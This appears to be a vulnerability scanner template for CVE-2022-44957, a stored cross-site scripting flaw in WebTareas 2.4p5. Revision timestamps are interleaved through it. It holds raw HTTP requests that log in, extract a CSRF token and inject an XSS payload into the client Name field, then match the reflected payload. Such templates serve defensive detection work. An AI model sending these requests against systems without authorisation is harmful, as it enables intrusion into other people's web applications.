2023-10-17 07:20:28 +00:00
id : CVE-2022-44957
info :
name : WebTareas 2.4p5 - Cross-Site Scripting
author : theamanrawat
severity : medium
description : |
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference :
- http://webtareas.com/
- https://github.com/anhdq201/webtareas/issues/11
- https://nvd.nist.gov/vuln/detail/CVE-2022-44957
2023-10-17 17:52:26 +00:00
- http://webtareas.com
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2022-44957
cwe-id : CWE-79
2023-11-03 10:59:12 +00:00
epss-score : 0.00186
2023-11-23 13:39:16 +00:00
epss-percentile : 0.55844
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : webtareas_project
product : webtareas
tags : cve,cve2022,xss,webtareas,authenticated,intrusive
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
POST /general/login.php?session=false HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------3023071625140724693672385525
-----------------------------3023071625140724693672385525
Content-Disposition : form-data; name="action"
login
-----------------------------3023071625140724693672385525
Content-Disposition : form-data; name="loginForm"
{{username}}
-----------------------------3023071625140724693672385525
Content-Disposition : form-data; name="passwordForm"
{{password}}
-----------------------------3023071625140724693672385525
Content-Disposition : form-data; name="loginSubmit"
Log In
-----------------------------3023071625140724693672385525 --
- |
GET /clients/editclient.php? HTTP/1.1
Host : {{Hostname}}
- |
POST /clients/editclient.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------34025600472463336623659912061
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="csrfToken"
{{csrf}}
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="action"
add
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="cown"
1
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="cn"
{{randstr}}<details/open/ontoggle=alert(document.domain)>
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="add"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="zip"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="ct"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="cou"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="wp"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="fa"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="url"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="email"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="curr"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="wc"
1
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="pym"
1
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="pyt"
7
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="c"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="ssc"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="file1"; filename=""
Content-Type : application/octet-stream
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="attnam1"
-----------------------------34025600472463336623659912061
Content-Disposition : form-data; name="atttmp1"
-----------------------------34025600472463336623659912061 --
host-redirects : true
cookie-reuse : true
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- '<details/open/ontoggle=alert(document.domain)>'
- 'clients/listclients.php?'
condition : and
- type : word
part : header_3
words :
- text/html
extractors :
- type : regex
name : csrf
group : 1
regex :
- 'name="csrfToken" value="([0-9a-zA-Z]+)"'
internal : true
2023-11-23 07:42:52 +00:00
# digest: 4b0a00483046022100e7fb661b7337aa218c7edde415333c38db2e5603617a4f08c475b6862974b7d502210098e235575546cdb85529257a03799e4009abbe038916be5c5f1ef6b447d071d9:922c64590222798bb761d5b6d8e72950